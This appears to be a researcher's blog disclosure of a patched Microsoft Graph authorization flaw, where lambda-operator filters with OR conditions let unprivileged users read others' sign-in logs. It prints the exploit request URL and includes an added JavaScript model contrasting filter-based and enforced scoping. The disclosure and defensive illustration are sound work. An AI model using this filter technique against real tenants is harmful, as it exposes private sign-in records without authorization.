Background
Not so long ago I was investigating various Azure related portals, and one of them caught my attention. While that portal did not yield any obvious vectors for exploitation, it raised my interest to see if I could go beyond a user reading their own logs¹
¹Users can read their own sign-in logs to manually look for uncommon behaviour (this is standard behaviour)
Scope
The issue described allowed an unprivileged user to craft Graph search filters so that the user could access logs which would normally require admin roles.
Affected service
- Graph API AuditLogs endpoint
- Endpoint and operation tested to be vulnerable
/beta/auditLogs/signIns
MSRC Categorization
- Severity: Important
- Security Impact: Information Disclosure
Timeline
MSRC (Microsoft Security Response Center) provided a fast response and proceeded to fix the issue on a fast timeline
- 02/2022 Finding submitted to MSRC
- 03/2022 MSRC confirms the reported behaviour
- 03/2022 MSRC confirms that fix has been issued for the described vulnerability
Details
What I discovered was that the Graph API allowed a non-privileged user to access privileged logs when advanced lambda operators were used in the filter, essentially calling the /auditLogs endpoint beyond their own permissions.
❌ Trying to get user logs with basic filters
code:'Authentication_RequestFromUnsupportedUserRole'
innerError:{date: '2022-01-27T12:13:45', request-id: '05b046db-27ba-405c-8532-35ce96025018', client-request-id: '05b046db-27ba-405c-8532-35ce96025018'}
message:'User is not in the allowed roles'
✅ When complex filtering with lambda operators and multiple OR conditions was used, the user got access to sensitive logs
var operation = `https://graph.microsoft.com/beta/auditLogs/signIns?&$filter=signInEventTypes/any(t: t eq 'interactiveUser' or t eq 'nonInteractiveUser' or userId eq 'fff4c705-62e2-4215-9dc8-90f208d15267' )`
✅ Below is an example snippet of the Graph API call with the exploitable filter in use.

⚠️ The result was a full dump of sensitive sign-in logs
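As an added illustration that is not part of the original post and is not Microsoft's code: a small JavaScript model of two ways a service can scope an audit-log query. It reproduces the filter shape from the report against constructed records; the record ids, the caller id and the weak "inspect the filter text" check are all hypothetical, chosen to show why authorization has to be enforced on the data that is returned rather than inferred from the filter expression.

```javascript
// Constructed sample sign-in records; ids are made up, not from the report.
const CALLER = "user-aaaa"; // hypothetical non-privileged caller
const RECORDS = [
  { id: 1, userId: "user-aaaa", signInEventTypes: ["interactiveUser"] },
  { id: 2, userId: "user-bbbb", signInEventTypes: ["nonInteractiveUser"] },
  { id: 3, userId: "user-cccc", signInEventTypes: ["interactiveUser"] },
  { id: 4, userId: "user-dddd", signInEventTypes: ["servicePrincipal"] },
];

// Raw $filter in the shape shown in the report, and the predicate the
// service compiles it to. Because the self-scoping term sits inside an OR,
// it does not narrow the result at all.
const filterText =
  `signInEventTypes/any(t: t eq 'interactiveUser' or t eq 'nonInteractiveUser' or userId eq '${CALLER}')`;
const compiled = (r) =>
  r.signInEventTypes.some(
    (t) => t === "interactiveUser" || t === "nonInteractiveUser" || r.userId === CALLER
  );

// Weak pattern (hypothetical model): authorization is decided by looking
// for a self-scoping clause in the filter text, then the filter alone
// decides which rows come back.
function queryByFilterInspection(caller, isAdmin, text, pred) {
  const selfScoped = text.includes(`userId eq '${caller}'`);
  if (!isAdmin && !selfScoped) throw new Error("User is not in the allowed roles");
  return RECORDS.filter(pred);
}

// Hardened pattern: the caller's scope is a data constraint ANDed with
// whatever filter was supplied, so filter complexity cannot widen it.
function queryWithEnforcedScope(caller, isAdmin, pred) {
  const inScope = (r) => isAdmin || r.userId === caller;
  return RECORDS.filter((r) => inScope(r) && pred(r));
}

const leaked = queryByFilterInspection(CALLER, false, filterText, compiled);
const scoped = queryWithEnforcedScope(CALLER, false, compiled);
console.log(leaked.map((r) => r.id)); // [1, 2, 3]: other users' rows returned
console.log(scoped.map((r) => r.id)); // [1]: only the caller's own matching row
```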

Ending words
As always, when something more complex is applied to the authorization process, things tend to get more interesting. This is definitely something I will stay on the lookout for.
Be sure to follow MSRC on Twitter, and stay tuned for more security research on my blog!
Microsoft Cloud Security Research – Public Disclosure – Gaining Unlimited access to graph AuditLogs endpoint using complex filters with non-privileged user account